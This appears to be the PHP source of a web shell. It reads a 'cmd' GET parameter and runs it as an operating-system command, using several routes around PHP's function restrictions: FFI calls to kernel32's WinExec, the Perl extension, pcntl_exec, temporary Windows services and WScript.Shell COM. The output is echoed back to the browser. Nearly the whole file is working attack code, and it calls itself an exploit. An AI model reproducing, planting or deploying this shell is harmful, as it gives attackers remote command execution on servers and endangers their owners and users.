function ffishelL($command)
{
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c {$command} >\"{$name}\"", 0);
while (!file_exists($name)) {
sleep(1);
}
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function exeversion_ffi($file)
{
if (!DEBUG) {
return "?";
}
// not yet stable
if (function_exists('ffi') or loadPhpExtension('ffi')) {
$win32_idl = "\nstruct VS_FIXEDFILEINFO {\n DWORD dwSignature;\n DWORD dwStrucVersion;\n DWORD dwFileVersionMS;\n DWORD dwFileVersionLS;\n DWORD dwProductVersionMS;\n DWORD dwProductVersionLS;\n DWORD dwFileFlagsMask;\n DWORD dwFileFlags;\n DWORD dwFileOS;\n DWORD dwFileType;\n DWORD dwFileSubtype;\n DWORD dwFileDateMS;\n DWORD dwFileDateLS;\n};\nstruct VS_VERSIONINFO { struct VS_VERSIONINFO\n WORD wLength; \n WORD wValueLength; \n WORD wType; \n WCHAR szKey[1]; \n WORD Padding1[1]; \n VS_FIXEDFILEINFO Value; \n WORD Padding2[1]; \n WORD Children[1]; \n};\n[lib='kernel32.dll'] DWORD GetFileVersionInfoSizeA(char *szFileName, DWORD *dwVerHnd);\n[lib='kernel32.dll'] int GetFileVersionInfoA(char *sfnFile, DWORD dummy, DWORD size, struct VS_VERSIONINFO *pVer);\n";
$ffi = new ffi($win32_idl);
$dummy = 0;
// &DWORD
$size = $ffi->GetFileVersionInfoSizeA($file, $dummy);
//$pVer = str_repeat($size+1);
$pVer = new ffi_struct($ffi, "VS_VERSIONINFO");
if ($ffi->GetFileVersionInfoA($file, 0, $size, $pVer) and $pVer->wValueLength) {
// analyze the VS_FIXEDFILEINFO(Value);
// $pValue = new ffi_struct($ffi, "VS_FIXEDFILEINFO");
$pValue =& $pVer->Value;
return sprintf("%d.%d.%d.%d", $pValue->dwFileVersionMS >> 16, $pValue->dwFileVersionMS & 0xffff, $pValue->dwFileVersionLS >> 16, $pValue->dwFileVersionLS & 0xffff);
}
}
}
function z6v($c)
{
global $win, $tempdir;
$r = '';
if (!empty($c)) {
if (!$win) {
if (extension_loaded('perl')) {
@ob_start();
$p = new perl();
$p->eval("system('{$c}')");
$r = @ob_get_contents();
@ob_end_clean();
} elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) {
$r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n';
$o = $tempdir . uniqid('pcntl');
$pid = @pcntl_fork();
if ($pid == -1) {
$r .= '[-] Could not fork. Exit';
} elseif ($pid) {
$r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.';
} else {
$c = array(" -e 'system(\"{$c} > {$o}\")'");
if (@pcntl_exec('/usr/bin/perl', $c)) {
exit(0);
}
if (@pcntl_exec('/usr/local/bin/perl', $c)) {
exit(0);
}
die;
}
$r = z9p($o);
@unlink($o);
}
} else {
$o = $tempdir . uniqid('NJ');
if (extension_loaded('ffi')) {
$a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0);
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} elseif (extension_loaded('win32service')) {
$s = uniqid('NJ');
@win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\""));
@win32_start_service($s);
@win32_stop_service($s);
@win32_delete_service($s);
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} elseif (extension_loaded("win32std")) {
@win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} else {
$a = new COM("WScript.Shell");
$a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
$r = z9p($o);
}
@unlink($o);
}
}
return $r;
}
function win32_fork($app, $params = '', $startDir = '')
{
$win32_idl = "\n\t\t[lib='shell32.dll'] int ShellExecuteA(int handle, char *operation, char *file, char *param, char *directory, int show);\n\t\t";
$ffi = new ffi($win32_idl);
$show = 7;
//0: hided, 1: normal, 2: mini, 3:maxi, 4:inactive, 7:mini inactive
$result = $ffi->ShellExecuteA(0, "open", tfb_shellencode($app), $params, tfb_shellencode($startDir), $show);
return $result;
}
##########################################################
if (!extension_loaded('ffi')) {
die('ERROR: FFI extension is not loaded!');
}
$command = empty($_GET['cmd']) ? 'dir' : $_GET['cmd'];
if (is_writeable(dirname(__FILE__))) {
$tmp = dirname(__FILE__);
} elseif (is_writeable(ini_get('session.save_path'))) {
$tmp = ini_get('session.save_path');
} elseif (is_writeable(ini_get('upload_tmp_dir'))) {
$tmp = ini_get('upload_tmp_dir');
} else {
die('ERROR: Move exploit to writeable folder.');
}
$output = "{$tmp}\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c {$command} >\"{$output}\"", 0);
while (!file_exists($output)) {
sleep(1);
}
$con = '';
$fp = fopen($output, 'r');
while (!feof($fp)) {
$con .= fgets($fp, 1024);
}
fclose($fp);
$con = htmlspecialchars($con);
echo "<pre>{$con}</pre>";
unlink($output);
?>
